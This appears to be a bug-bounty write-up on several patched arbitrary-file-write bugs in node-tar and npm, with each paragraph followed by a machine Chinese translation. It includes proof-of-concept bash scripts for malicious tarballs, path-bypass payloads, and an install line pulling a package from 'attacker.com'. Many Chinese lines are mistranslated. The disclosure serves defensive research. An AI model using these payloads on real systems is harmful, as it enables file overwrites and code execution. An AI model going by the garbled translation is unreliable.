5 RCEs in npm for $15,000

15,000美元的 npm 5 rce

I found and reported these vulnerabilities with @ginkoid.

我用@ginkoid 发现并报告了这些漏洞。

In this post, I will discuss the root cause of these vulnerabilities, as well as briefly walk through the exploitation process. I’ll also include some thoughts about bug bounty in general at the end.

在本文中,我将讨论这些漏洞的根本原因,并简要介绍利用这些漏洞的过程。最后,我还将包括一些关于 bug 赏金的想法。

These are the associated CVEs and payouts:

这些是相关的乡镇企业和支出:

CVE-2021-39134 affects @npmcli/arborist. The others affect node-tar.

CVE-2021-39134影响@npmcli/arborist。其他影响节点焦油。

Background 背景

Around the middle of July, GitHub launched a private bug bounty program that focused on the npm CLI.

7月中旬左右,GitHub 推出了一个专注于 npm CLI 的私人错误赏金计划。

We noticed an interesting item in scope:

我们注意到一个有趣的项目:

  • RCE that breaks out of --ignore-scripts at install or update with no other interaction
  • 在安装或更新时突破 — ignore-scripts 而没有其他交互的 RCE

This seems like a rather large attack surface. npm install is responsible for pulling down tar files from the npm registry, organizing dependencies, and possibly running install scripts (although presumably that would be disabled with --ignore-scripts).

这似乎是一个相当大的攻击面。Npm install 负责从 npm 注册表中下拉 tar 文件,组织依赖项,并可能运行安装脚本(尽管可能会使用 — ignore-scripts 禁用)。

Before approaching any target, it’s usually a good idea to do a bit of preliminary analysis to see what the attack surface looks like. We came across CVE-2019-16776 which involved improper path checks on binary fields. We audited the relevant code but didn’t find anything.

在接近任何目标之前,最好先做一些初步分析,看看攻击面是什么样子。我们遇到了 CVE-2019-16776,其中涉及对二进制字段进行不正确的路径检查。我们审查了相关的代码,但没有发现任何东西。

We needed to go deeper.

npm’s package installation architecture uses a variety of self-maintained packages. Some of the more complex ones we audited included:

Npm 的软件包安装体系结构使用了各种自我维护的软件包:

As a side note, we noticed that most of the underlying packages for npm were maintained by a few authors.

顺便说一下,我们注意到大多数 npm 的底层包都是由少数作者维护的。

insert relevant xkcd

插入相关的 xkcd

I think it’s somewhat humbling to consider the vastness of Internet infrastructure. Every day, we use millions of lines of code, which we assume secure. With such a popular dependency – node-tar had 25 million weekly downloads as of this post – somebody must have checked the code.

我认为,考虑到互联网基础设施的庞大规模,这有些令人感到谦卑。每天,我们使用数百万行代码,我们认为这些代码是安全的。有了这样一个流行的依赖节点—— tar,在本文之前每周有2500万次下载——一定有人检查了代码。

Right?

对吧?

(Un)fortunately the answer to the previous question is no, or I suppose I wouldn’t be writing this post.

幸运的是,上一个问题的答案是否定的,否则我想我不会写这篇文章。

Absolute 绝对

One of the security guarantees that node-tar provides is that extraction can only overwrite files under the given directory. If an extraction could overwrite global files, a malicious tar file could overwrite any file on your system.

Node-tar 提供的安全保证之一是提取只能覆盖给定目录下的文件。如果提取可以覆盖全局文件,则恶意 tar 文件可以覆盖系统上的任何文件。

For example, the npm install command deals entirely with untrusted tarballs. Aside from ensuring the uploaded tarball is syntactically valid, very little additional sanitization was performed.

例如,npminstall 命令完全处理不可信的 tarballs。除了确保上传的 tarball 在语法上有效之外,几乎没有执行其他的清理操作。

Note that after our reports, npm started applying stricter filters.

注意,在我们的报告之后,npm 开始应用更严格的过滤器。

on July 29, 2021 we started blocking the publication of npm packages that contain symbolic links, hard links, or absolute paths.

2021年7月29日,我们开始阻止包含符号链接、硬链接或绝对路径的 npm 包的发布。

Package tarball extraction also happens even with --ignore-scripts, making this a very interesting attack surface for this particular bug bounty program.

包 tarball 抽取甚至可以使用 — ignore-scripts,这使得它成为这个特定错误赏金计划的一个非常有趣的攻击表面。

Zero

The first vulnerability we reported was an arbitrary file write in NPM cli. See if you can spot the vulnerability.

我们报告的第一个漏洞是 npmcli 中的任意文件写入。

	  // p = `entry.path` is attacker controlled

      // absolutes on posix are also absolutes on win32
      // so we only need to test this one to get both
      if (path.win32.isAbsolute(p)) {
        const parsed = path.win32.parse(p)
        entry.path = p.substr(parsed.root.length)
        const r = parsed.root
        this.warn('TAR_ENTRY_INFO', `stripping ${r} from absolute path`, {
          entry,
          path: p,
        })
      }

	  // do file operations with `entry.path`

When auditing node-tar, this code immediately seemed suspicious. File paths are pretty complex, would naively taking a substring work? We can easily confirm any assumptions with the node cli.

在审计 node-tar 时,此代码立即显得可疑。文件路径非常复杂,天真地使用子字符串会起作用吗?我们可以很容易地用节点 cli 来确认任何假设。

> path.win32.parse("///tmp/pwned")
{ root: '/', dir: '///tmp', base: 'pwned', ext: '', name: 'pwned' }

Hmm… This would set parsed.root to /. After stripping, entry.path would become //tmp/pwned. This will then resolve to our absolute path, bypassing the original check!

嗯… 这会把 parsed.root 设置为/。剥离后,entry.path 将变为//tmp/pwned。这样就会解析到我们的绝对路径,绕过原来的检查!

> path.resolve("//tmp/pwned")
'/tmp/pwned'

Note that although node-tar does not do an explicit path.resolve, we suspected that node’s file operation API would internally do some sort of resolve. We can confirm this hypothesis by either looking at node’s source code, or just manually testing the relevant fs operations.

注意,尽管 node-tar 没有执行显式的 path.resolve,但我们怀疑 node 的文件操作 API 会在内部执行某种解析。我们可以通过查看 node 的源代码或者手动测试相关的 fs 操作来确认这个假设。

> fs.existsSync("/tmp/pwned")
false
> fs.writeFileSync("//tmp/pwned", "notdeghost")
undefined
> fs.existsSync("/tmp/pwned")
true

For now, the latter is easier (but we’ll come back to node source later).

现在,后者更容易(但我们稍后将回到节点源)。

This vulnerability allows us to write to any file upon package installation.

这个漏洞允许我们在包安装时写入任何文件。

To publish this to the registry, we can issue a PUT request to registry.npmjs.org.

为了将其发布到注册表,我们可以向注册 registry.npmjs.org 发出一个 PUT 请求。

One

The patch to this was quite comprehensive.

这个补丁是相当全面的。

// unix absolute paths are also absolute on win32, so we use this for both
const { isAbsolute, parse } = require('path').win32

// returns [root, stripped]
module.exports = path => {
  let r = ''
  while (isAbsolute(path)) {
    // windows will think that //x/y/z has a "root" of //x/y/
    const root = path.charAt(0) === '/' ? '/' : parse(path).root
    path = path.substr(root.length)
    r += root
  }
  return [r, path]
}

The absolute path check was refactored out into a seperate file. Note how the while (isAbsolute(path)) provides a strict guarantee that path will never be isAbsolute.

绝对路径检查被重构为单独的文件。请注意 while (isAbsolute (path))是如何严格保证路径永远不会是 isAbsolute 的。

diff --git a/lib/unpack.js b/lib/unpack.js
index 7d4b79d..216fa71 100644
--- a/lib/unpack.js
+++ b/lib/unpack.js
@@ -14,6 +14,7 @@ const path = require('path')
 const mkdir = require('./mkdir.js')
 const wc = require('./winchars.js')
 const pathReservations = require('./path-reservations.js')
+const stripAbsolutePath = require('./strip-absolute-path.js')

 const ONENTRY = Symbol('onEntry')
 const CHECKFS = Symbol('checkFs')
@@ -224,11 +225,10 @@ class Unpack extends Parser {

       // absolutes on posix are also absolutes on win32
       // so we only need to test this one to get both
-      if (path.win32.isAbsolute(p)) {
-        const parsed = path.win32.parse(p)
-        entry.path = p.substr(parsed.root.length)
-        const r = parsed.root
-        this.warn('TAR_ENTRY_INFO', `stripping ${r} from absolute path`, {
+      const [root, stripped] = stripAbsolutePath(p)
+      if (root) {
+        entry.path = stripped
+        this.warn('TAR_ENTRY_INFO', `stripping ${root} from absolute path`, {
           entry,
           path: p,
         })

This “never absolute” path is then assigned to entry.path. Surely this is secure right?

这条“绝不绝对”的道路然后被分配到入口。这条道路肯定是安全的,对吗?

Note that paths with double dots are also filtered out, so we can’t just escape with a path like ../../overwrite.

请注意,带有双点的路径也会被过滤掉,因此我们不能只使用. ./. ./覆盖这样的路径进行转义。

      if (p.match(/(^|\/|\\)\.\.(\\|\/|$)/)) {
        this.warn('TAR_ENTRY_ERROR', `path contains '..'`, {
          entry,
          path: p,
        })
        return false
      }

Another interesting thought experiment:

另一个有趣的思想实验是:

// entry.path is attacker controlled, but can't be `isAbsolute`. 
entry.absolute = path.resolve(this.cwd, entry.path)
// do file operations with entry.path

We can assume that the original entry.path is not an absolute path. Thus, we can essentially ignore the effects of the stripAbsolutePath function and consider only paths that aren’t absolute.

我们可以假设最初的 entry.path 不是一条绝对的路径。因此,我们基本上可以忽略 stripAbsolutePath 函数的影响,只考虑不是绝对的路径。

In general, when looking for vulnerabilities, it’s often helpful to reduce the problem to an equivalent but simpler problem.

一般来说,在寻找漏洞时,将问题简化为一个相同但更简单的问题通常是有帮助的。

What is an absolute path? Paths that start with / appear to be absolute, but are there any edge cases?

什么是绝对路径? 以/开始的路径看起来是绝对的,但是有没有边情况?

> path.win32.isAbsolute("/")
true
> path.win32.isAbsolute("///")
true
> path.win32.isAbsolute("C:/")
true

When we’re faced with such implementation-dependent questions (is there even a spec for file systems?), the best option is to go back to the source.

当我们面对这种依赖于实现的问题时(文件系统是否有规范?),最好的选择是回到源头。

Note that for isAbsolute as defined here, there are two different implementations for posix and windows. Because node-tar uses path.win32, we want to make sure we’re looking at the Windows one.

注意,对于这里定义的 isAbsolute,posix 和 windows 有两种不同的实现。因为 node-tar 使用 path.win32,所以我们希望确保查看的是 Windows 1。

function isPathSeparator(code) {
  return code === CHAR_FORWARD_SLASH || code === CHAR_BACKWARD_SLASH;
}

function isWindowsDeviceRoot(code) {
  return (code >= CHAR_UPPERCASE_A && code <= CHAR_UPPERCASE_Z) ||
         (code >= CHAR_LOWERCASE_A && code <= CHAR_LOWERCASE_Z);
}

// ...

  /**
   * @param {string} path
   * @returns {boolean}
   */
  isAbsolute(path) {
    validateString(path, 'path');
    const len = path.length;
    if (len === 0)
      return false;

    const code = StringPrototypeCharCodeAt(path, 0);
    return isPathSeparator(code) ||
      // Possible device root
      (len > 2 &&
      isWindowsDeviceRoot(code) &&
      StringPrototypeCharCodeAt(path, 1) === CHAR_COLON &&
      isPathSeparator(StringPrototypeCharCodeAt(path, 2)));
  },

This confirms our suspicions. There are two cases for absolute paths. First, the path must begin with a / a \. Alternatively, the path must look like a drive root, for example c:/ or C:\.

这证实了我们的怀疑。绝对路径有两种情况。首先,路径必须以 a/a 开头。或者,路径必须看起来像驱动器根目录,例如 c:/或 c: 。

What does path.resolve do then? We can look at the source code again, but the function is 148 lines long. During our actual analysis, I spent quite some time trying to understand the source – printf debugging saved the day here. For the purposes of this blog post, I’ll skip to the “cheat code”.

那么 path.resolve 做什么呢?我们可以再次查看源代码,但函数有148行长。在我们的实际分析过程中,我花了相当多的时间试图理解 source-printf 调试在这里节省了时间。为了这篇博客文章的目的,我将跳到“作弊代码”。

Enter test-path-resolve.js.

输入 test-path-resolve. js。

const resolveTests = [
  [ path.win32.resolve,
    // Arguments                               result
    [[['c:/blah\\blah', 'd:/games', 'c:../a'], 'c:\\blah\\a'],

What’s going on here? Is there special handling for paths of the form C:${PATH}?

这是怎么回事? 对于 c: ${ PATH }形式的路径是否有特殊的处理?

> path.resolve('C:/example/dir', 'C:../a')
'C:\\example\\a'
> path.resolve('C:/example/dir', 'D:different/root')
'D:\\different\\root'

It appears so. This is our bypass!

看起来是这样,这是我们的旁路!

Note that even though double dots are filtered out, the regex only matches double dots between path deliminators and the start/end of strings which C:../ passes.

注意,即使过滤掉了双点,正则表达式也只匹配路径分隔符和 c: 的字符串的开始/结束之间的双点。./通过。

Unfortunately, the primitive we get here isn’t the best – we can only write into paths one directory up. Because the extraction occurs in a node_modules directory, we are only able to write into other installed packages, which doesn’t give a direct path for escalation.

不幸的是,我们在这里得到的原语并不是最好的——我们只能写入一个目录上的路径。因为提取发生在 node _ modules 目录中,所以我们只能写入其他已安装的包,这并不提供升级的直接路径。

An idea we explored was writing into a symlinked package. For example, we create a package AAAA which is symlinked to /path/to/. We then extract into C:../AAAA/overwrite. This would – in theory – overwrite /path/to/overwrite.

我们探索的一个想法是将文字写入一个符号链接的包装中。例如,我们创建一个符号链接到/path/to/的包 AAAA。然后我们提取到 c: 。./AAAA/覆盖。这在理论上会覆盖/路径/覆盖。

This exploit strategy involved a race condition and was not very reliable.

这个开发策略包含了一个竞争条件,并且不是很可靠。

We reported this vulnerability with a proof of concept, but unfortunately it was already discovered by a member of GitHub’s security team.

我们报告了这个漏洞的概念验证,但不幸的是,GitHub 安全团队的一名成员已经发现了这个漏洞。

Caches 隐藏处

Like many tar implementations, node-tar allows for the extraction of symlinks and hardlinks.

与许多 tar 实现一样,node-tar 允许提取符号链接和硬链接。

      case 'Link':
        return this[HARDLINK](entry, done)

      case 'SymbolicLink':
        return this[SYMLINK](entry, done)

In order to prevent overwriting arbitrary files on the file system, node-tar will check to make sure that the folders it iterates over are not symlinks. Otherwise, you could use the symlink to traverse the file system. For example, create a symlink symlink -> /path/to and extract a file to symlink/overwrite.

为了防止覆盖文件系统中的任意文件,node-tar 将进行检查,以确保它遍历的文件夹不是符号链接。否则,您可以使用 symlink 来遍历文件系统。例如,创建一个 symlink symlink->/path/to,并提取一个文件以进行 symlink/overwrite。

Interestingly, this check is done in mkdir.js, when creating the required parent directories for any given path.

有趣的是,在为任何给定路径创建所需的父目录时,这种检查是在 mkdir.js 中完成的。

      } else if (st.isSymbolicLink())
        return cb(new SymlinkError(part, part + '/' + parts.join('/')))

node-tar also maintains a cache of the directories already created as a performance optimization. This has the important implication of skipping the symlink checks for folders that exist in the directory cache.

Node-tar 还维护作为性能优化而创建的目录的缓存。这意味着跳过目录缓存中存在的文件夹的符号链接检查。

  if (cache && cache.get(dir) === true)
    return done()

In other words, the security of node-tar depends on the accuracy of the directory cache. If we can fake an entry or otherwise desynchronize the cache, we can extract through a symlink and write to arbitrary files on the filesystem.

换句话说,node-tar 的安全性取决于目录缓存的准确性。如果我们可以伪造一个条目或者以其他方式去同步缓存,我们可以通过一个符号链接提取并写入文件系统上的任意文件。

Unfortunately, these vulnerabilities do not affect the npm cli, because npm’s extraction explicitly filters out symlinks and hardlinks.

不幸的是,这些漏洞不会影响 npm cli,因为 npm 的提取显式地过滤掉了符号链接和硬链接。

      filter: (name, entry) => {
        if (/Link$/.test(entry.type))
          return false

Zero

Initially, the directory cache did not purge entries on folder deletion. This made it pretty easy to bypass.

最初,目录缓存没有清除文件夹删除的条目,这使得绕过目录缓存变得非常容易。

For our proof of concept, we used three files:

为了进行概念验证,我们使用了三个文件:

  1. MKDIR poison
  2. MKDIR 毒药
  3. SYMLINK poison -> /target/path
  4. SYMLINK 毒药->/target/path
  5. FILE poison/overwrite
  6. 文件毒药/覆盖

This payload can be generated from a bash script with:

这个负载可以通过 bash 脚本生成:

#!/bin/sh

mkdir x
tar cf poc.tar x
rmdir x
ln -s /tmp x
echo 'arbitrary file write in node-tar' > x/pwned
tar rf poc.tar x x/pwned
rm x/pwned x

This works because at the time of reporting, the symlink step will implicitly delete any folders or files it encounters, if that file already exists. Note how the code does not update the directory cache.

这是因为在报告时,符号链接步骤将隐式删除遇到的任何文件夹或文件,如果该文件已经存在的话。注意代码如何不更新目录缓存。

          } else
            fs.rmdir(entry.absolute, er => this[MAKEFS](er, entry, done))
        } else
          unlinkFile(entry.absolute, er => this[MAKEFS](er, entry, done))

Testing this is quite simple too.

测试这一点也很简单。

$ npm i tar@6.1.1
$ node -e 'require("tar").x({ file: "poc.tar" })'
$ cat /tmp/pwned
arbitrary file write in node-tar

One

The solution to this was, perhaps intuitively, to remove the entry from the directory cache.

解决这个问题的办法可能是直观地从目录缓存中删除该条目。

commit 9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20
Author: isaacs <i@izs.me>
Date:   Mon Jul 26 16:10:30 2021 -0700

    Remove paths from dirCache when no longer dirs

This patch added the following code to lib/unpack.js.

这个补丁将以下代码添加到 lib/unpack.js 中。

    // if we are not creating a directory, and the path is in the dirCache,
    // then that means we are about to delete the directory we created
    // previously, and it is no longer going to be a directory, and neither
    // is any of its children.
    if (entry.type !== 'Directory') {
      for (const path of this.dirCache.keys()) {
        if (path === entry.absolute ||
            path.indexOf(entry.absolute + '/') === 0 ||
            path.indexOf(entry.absolute + '\\') === 0)
          this.dirCache.delete(path)
      }
    }

Note how in theory, path.indexOf(entry.absolute + '/') and path.indexOf(entry.absolute + '\\') will purge all entries which have our current path as a prefix.

请注意,在理论上,path.indexOf (entry.absolute +’/’)和 path.indexOf (entry.absolute +’)将清除所有前缀为当前路径的条目。

Why do we have two checks for slash and backslash? Shouldn’t this be conditioned on the current environment – ie backslash if it’s Windows and slash if it’s not.

为什么斜杠和反斜杠有两个检查项?这难道不应该受到当前环境的限制吗——即反斜杠(如果是 Windows)和斜杠(如果不是)。

It turns out, the original test case actually worked on Windows still. To understand why, we need to look at how the directory cache entries are populated.

事实证明,最初的测试用例在 Windows 上仍然有效。为了理解其中的原因,我们需要查看目录缓存条目是如何填充的。

  const sub = path.relative(cwd, dir)
  const parts = sub.split(/\/|\\/)
  let created = null
  for (let p = parts.shift(), part = cwd;
    p && (part += '/' + p);
    p = parts.shift()) {
    if (cache.get(part))
      continue
      
    try {
      fs.mkdirSync(part, mode)
      created = created || part
      cache.set(part, true)
    } catch (er) {

It looks like the path is being split on both back and forward slashes. The entries are then joined with forward slashes before being inserted into the directory cache.

看起来路径在前后斜线上都被分开了。然后,在将这些条目插入到目录缓存中之前,先用前向斜杠连接这些条目。

For example:

例如:

  • directory cache: C:\abc\test-unpack/x
  • 目录缓存: c: abc test-unpack/x
  • entry.absolute: C:\abc\test-unpack\x

When we create the directory, ...\test-unpack/x will be inserted into the directory cache. When we try and remove a folder, entry.absolute will be ...\test-unpack\x.

当我们创建目录时,… test-unpack/x 将插入到目录缓存中。当我们尝试删除一个文件夹时,entry.absolute 将是… test-unpack x。

This means the following checks will never be satisfied.

这意味着下列检查将永远不会得到满足。

        if (path === entry.absolute ||
            path.indexOf(entry.absolute + '/') === 0 ||
            path.indexOf(entry.absolute + '\\') === 0)

We would be checking for ...\test-unpack\x, ...\test-unpack\x/, and ...\test-unpack\x\, none of which match ...\test-unpack/x.

我们将检查… test-unpack x,… test-unpack x/,和… test-unpack x,没有一个匹配… test-unpack/x。

Thus, we can remove a folder without purging the corresponding entry from the directory cache. Then when we extract through the symlink, it will renormalize the path with forward slashes, thus aborting early and skipping the security checks.

因此,我们可以移除一个文件夹,而不需要从目录缓存中清除相应的条目。然后当我们提取符号链接时,它会用前向斜杠重新整合路径,从而提前终止并跳过安全检查。

A different issue, but with the same root cause, exists on Unix.

在 Unix 上存在一个不同的问题,但是有着相同的根源。

If we create a path with name a\\x, security checks will be performed on a and a/x but not the actual file a\\x. Thus, if we create our symlink with a filename that contains a backslash, we will be able to bypass the directory cache protections again!

如果我们创建一个名为 x 的路径,安全检查将在 a 和 a/x 上执行,而不是在实际文件 a x 上执行,因此,如果我们创建符号链接的文件名包含一个反斜杠,我们将能够再次绕过目录缓存保护!

#!/bin/sh

ln -s /tmp a\\x
tar cf poc.tar a\\x
echo 'arbitrary file write in node-tar' > a\\x/pwned
tar rf poc.tar a\\x a\\x/pwned
rm a\\x

Two

The patch to this felt very “defense in depth”.

这个补丁感觉非常“纵深防御”。

commit 53602669f58ddbeb3294d7196b3320aaaed22728
Author: isaacs <i@izs.me>
Date:   Wed Aug 4 15:48:21 2021 -0700

fix: normalize paths on Windows systems

This change uses / as the One True Path Separator, as the gods of POSIX
intended in their divine wisdom.

On windows, \ characters are converted to /, everywhere and in depth.
However, on posix systems, \ is a valid filename character, and is not
treated specially.  So, instead of splitting on `/[/\\]/`, we can now
just split on `'/'` to get a set of path parts.

This does mean that archives with entries containing \ will extract
differently on Windows systems than on correct systems.  However, this
is also the behavior of both bsdtar and gnutar, so it seems appropriate
to follow suit.

Additionally, dirCache pruning is now done case-insensitively.  On
case-sensitive systems, this potentially results in a few extra lstat
calls.  However, on case-insensitive systems, it prevents incorrect
cache hits.

All directory cache operations are routed through helper functions, which normalize entries.

所有目录缓存操作都通过 helper 函数进行路由,这些函数规范化了条目。

const cGet = (cache, key) => cache.get(normPath(key))
const cSet = (cache, key, val) => cache.set(normPath(key), val)

Cache removal was also refactored out into a centralized place.

缓存删除也被重构到一个集中的位置。

const pruneCache = (cache, abs) => {
  // clear the cache if it's a case-insensitive match, since we can't
  // know if the current file system is case-sensitive or not.
  abs = normPath(abs).toLowerCase()
  for (const path of cache.keys()) {
    const plower = path.toLowerCase()
    if (plower === abs || plower.toLowerCase().indexOf(abs + '/') === 0)
      cache.delete(path)
  }
}

Note that this deals with case insensitive file systems as well, such as Windows and MacOS.

请注意,这也处理不区分大小写的文件系统,如 Windows 和 MacOS。

This should be enough right?

这应该足够了吧?

Not quite. NFD normalization saves (ruins?) the day.

不完全是。 NFD 标准化保存(废墟?)的一天。

It turns out MacOS does additional normalization of paths, violating the assumptions for the directory cache.

事实证明 MacOS 对路径进行了额外的规范化,违反了对目录缓存的假设。

> fs.readdirSync(".")
[]
> fs.writeFileSync("\u00e9", "AAAA")
undefined
> fs.readdirSync(".")
[ 'é' ]
> fs.unlinkSync("\u0065\u0301")
undefined
> fs.readdirSync(".")
[]

The exploit strategy should be pretty straightforward at this point. We create a folder named \u00e9, a symlink named \u0065\u0301 (which also deletes the first folder), and finally write to \u00e9/pwned.

在这一点上,开发策略应该非常简单。我们创建一个名为 u00e9的文件夹,一个名为 u0065 u0301的符号链接(它也会删除第一个文件夹) ,最后写到 u00e9/pwned。

Because only \u00e9 exists in the directory cache and not \u0065\u0301, the directory cache becomes desynchronized from the file system, allowing us to skip the symlink security checks.

因为目录缓存中只有 u00e9,而不是 u0065 u0301,所以目录缓存将从文件系统中去同步,从而允许我们跳过符号链接安全检查。

Unfortunately, this was also already found internally by a member of GitHub’s security team, but it was still a rather interesting vulnerability nonetheless. As a side note, JarLob’s discovery also involved “long path portions” which we hadn’t considered.

不幸的是,GitHub 安全团队的一名成员已经在内部发现了这个漏洞,尽管如此,这仍然是一个相当有趣的漏洞。顺便说一句,JarLob 的发现还涉及到我们没有考虑到的“长路径部分”。

Fin

# 芬

We reported a series of three vulnerabilities involving the directory cache. In general, we felt like the directory cache was quite difficult to maintain. Any inconsistency with the filesystem leads to an arbitrary write vulnerability. Filesystems are deceivingly complex, with annoying edge cases to support all systems.

我们报告了一系列涉及目录缓存的三个漏洞。通常,我们认为目录缓存很难维护。任何与文件系统的不一致都会导致任意的写漏洞。文件系统复杂得让人难以理解,支持所有系统的边缘情况令人恼火。

In the end, the decision was made to drop the entire directory cache when a symlink was encountered. In hindsight, this was probably the best solution.

最后,决定在遇到符号链接时删除整个目录缓存。事后看来,这可能是最好的解决方案。

commit 23312ce7db8a12c78d0fba96d7664a01619266a3
Author: isaacs <i@izs.me>
Date:   Wed Aug 18 19:34:33 2021 -0700

    drop dirCache for symlink on all platforms

diff --git a/lib/unpack.js b/lib/unpack.js
index b889f4f..7f397f1 100644
--- a/lib/unpack.js
+++ b/lib/unpack.js
@@ -550,13 +550,13 @@ class Unpack extends Parser {
     // then that means we are about to delete the directory we created
     // previously, and it is no longer going to be a directory, and neither
     // is any of its children.
-    // If a symbolic link is encountered on Windows, all bets are off.
-    // There is no reasonable way to sanitize the cache in such a way
-    // we will be able to avoid having filesystem collisions.  If this
-    // happens with a non-symlink entry, it'll just fail to unpack,
-    // but a symlink to a directory, using an 8.3 shortname, can evade
-    // detection and lead to arbitrary writes to anywhere on the system.
-    if (isWindows && entry.type === 'SymbolicLink')
+    // If a symbolic link is encountered, all bets are off.  There is no
+    // reasonable way to sanitize the cache in such a way we will be able to
+    // avoid having filesystem collisions.  If this happens with a non-symlink
+    // entry, it'll just fail to unpack, but a symlink to a directory, using an
+    // 8.3 shortname or certain unicode attacks, can evade detection and lead
+    // to arbitrary writes to anywhere on the system.
+    if (entry.type === 'SymbolicLink')
       dropCache(this.dirCache)

Additional Thoughts 额外的想法

I think these reports illustrate some interesting implications about bug bounty, and I wanted to take some time to write about my thoughts. There won’t be any security analysis in this section, so if you’re so-inclined perhaps skip to the conclusion.

我认为这些报告阐明了一些关于 bug 奖励的有趣暗示,我想花些时间写写我的想法。本节中不会进行任何安全性分析,因此如果您倾向于直接跳到结论部分。

Also as a disclaimer, these thoughts are based on my – somewhat limited – experiences as a bug bounty program participant. That being said, GitHub’s bounty program is one of the best we’ve hacked against, and I’ll illustrate how some of their practices help make this such an enjoyable program to engage with.

另外,作为一个免责声明,这些想法都是基于我作为一个错误赏金计划的参与者的有限经验。也就是说,GitHub 的赏金程序是我们攻击过的最好的程序之一,我将举例说明他们的一些做法是如何使这个程序成为一个令人愉快的程序。

Asymmetry

# # 不对称

Perhaps most importantly, there’s an inherent asymmetry between bug bounty reporters and internal red teams, which (in some instances heavily) favors internal teams.

也许最重要的是,bug 赏金记者和内部红色团队之间存在着内在的不对称性,在某些情况下,红色团队更倾向于内部团队。

I think the root cause of this is – bug bounty participants should fully or nearly fully implicate their vulnerabilities before reporting. At the same time, they must not hold on to their vulnerabilities for too long.

我认为这种情况的根本原因是——在报告之前,昆虫奖金参与者应该完全或几乎完全隐藏他们的弱点。与此同时,他们不能长时间地保持自己的弱点。

It’s hard to balance these two.

这两者很难平衡。

An example of this can be found in CVE-2021-37713. I had actually found this vulnerability on my plane ride to Defcon (at the time I joked that I had paid for the flight). On the other hand, we reported this vulnerability August 13th, a bit more than a week later.

可以在 CVE-2021-37713中找到这方面的例子。事实上,我在飞往 Defcon 的飞机上发现了这个漏洞(当时我开玩笑说我已经为这次飞行付了钱)。另一方面,我们在8月13日报道了这个漏洞,一周多以后。

The reason for this delayed report was because we wanted a way to escalate from a very low implication relative path overwrite to an actual RCE. We suspected it was possible by abusing symlinks and other node specific behavior, but it took a while to get a proof of concept working.

这个延迟报告的原因是因为我们想要一种方法,从一个非常低含义的相对路径覆盖升级到一个实际的 RCE。我们怀疑通过滥用符号链接和其他节点特定的行为是可能的,但是这需要一段时间才能得到概念工作的证明。

Another example of asymmetry would be suspicious behavior that where we don’t know if there are security implications. This might not be the best example because I suspect there are no real implications here, but we knew the path reservation system improperly handled case-sensitive file systems (although I suppose this is relatively trivial to find through variant analysis).

不对称的另一个例子是可疑行为,我们不知道是否有安全隐患。这可能不是最好的例子,因为我怀疑这里没有真正的含义,但是我们知道路径预留系统没有正确处理区分大小写的文件系统(尽管我认为通过变量分析找到这一点相对微不足道)。

We couldn’t actually report this because we hadn’t found any security implications – if one existed it would be racey.

我们实际上不能报道这件事,因为我们没有发现任何安全隐患——如果存在这样的隐患,那将是种族歧视。

I think these asymmetries are inherent in bug bounty. At the same time, I feel like it’s important for program administrators to be aware of such biases, and if possible compensate for them.

我认为这些不对称性是昆虫奖励固有的。与此同时,我觉得项目管理人员意识到这些偏见很重要,如果可能的话补偿这些偏见。

A good example of this would be the token bounty we received for CVE-2021-37712. Even though this vulnerability was already discovered internally, GitHub was nice enough to give us $1,000. This helped offset the time we put into investigating and producing a full POC. Perhaps more importantly, such a token bounty showed that GitHub cared about our engagement with their program.

一个很好的例子就是我们收到的 CVE-2021-37712的象征性奖励。尽管这个漏洞已经在内部被发现了,GitHub 还是给了我们1000美元。这有助于抵消我们花费在调查和生成一个完整 POC 的时间。也许更重要的是,这样一个象征性的 bounty 表明 GitHub 关心我们对他们程序的参与。

Balance

# # 平衡

Why do people do bug bounty?

人们为什么要赏金杀虫?

To secure software? Or money? The world can never be described in absolutes. I suppose the real answer is some mixture of the two, and people fall in various places on that spectrum.

为了保护软件?或者钱?世界永远不能绝对地描述。我认为真正的答案是两者的某种混合,人们在这个范围的不同位置。

Perhaps this could be better illustrated with an example.

也许这可以用一个例子来更好地说明。

We noticed another interesting entry in scope.

我们注意到范围中另一个有趣的条目。

  • Overwriting an executable that already exists with a globally installed package if --force has not been set
  • 用全局安装的包覆盖已经存在的可执行文件,如果 — force 没有设置

After some correspondence with GitHub staff, we confirmed this was how the vulnerability scope was intended to be defined:

在与 GitHub 的工作人员进行了一些通信之后,我们确认了漏洞范围是如何定义的:

$ npm i -g yarn
$ npm i -g attacker-package
$ yarn # if we control yarn, its a vulnerability

It turns out that this is trivially achievable by installing from a URL.

事实证明,通过 URL 安装是可以做到这一点的。

$ sudo npm i -g https://attacker.com/package.tar.gz

However, this was also marked as a “low” impact item according to our engagement documentation, and we thought that it probably wasn’t a serious concern. It seemed by design, and the use case for such a bug seemed extremely narrow.

然而,根据我们的业务文件,这也被标记为一个“低”影响项目,我们认为这可能不是一个严重的问题。这似乎是设计好的,而且这样一个 bug 的用例似乎非常狭窄。

In the end, we chose not to report it.

最后,我们选择不报道这件事。

A report is an affirmation that a vulnerability exists. As bug bounty hunters we don’t want to spam programs with low-impact pseudo-vulnerabilities. There’s often a balance between reporting only real impactful issues and trying to simply maximize bounties.

报告是对存在漏洞的肯定。作为 bug 赏金猎人,我们不希望垃圾邮件程序具有低影响的伪漏洞。通常在只报告真正有影响力的问题和试图简单地最大限度地提高报酬之间有一个平衡。

I think this also illustrates the importance of clearly defining scope items when creating private bug bounty programs. There’s always room for ambiguity, and having additional ways to communicate – for example, there’s a private GitHub bounty program Slack – is crucial for clearing up any confusion.

我认为这也说明了在创建私有的缺陷奖励程序时,明确定义范围项的重要性。模棱两可的地方总是存在的,而拥有其他的通信方式——例如,有一个私人的 GitHub 赏金程序 Slack ——对于消除任何混淆是至关重要的。

Conclusion 总结

Overall this engagement was quite enjoyable. We got to audit sections of node and npm internals which I – and I believe many others – assumed secure.

总的来说,这种接触是相当愉快的。我们审计了节点和 npm 内部的各个部分,我——我相信还有许多其他部分——认为这些部分是安全的。

Every day, we run countless lines of code but never consider who’s responsible for auditing them. Is absolute security possible?

每天,我们运行无数行代码,却从不考虑由谁负责审计它们?

Complexity breeds vulnerability; optimization demands compensation.

复杂性导致脆弱性; 优化需要补偿。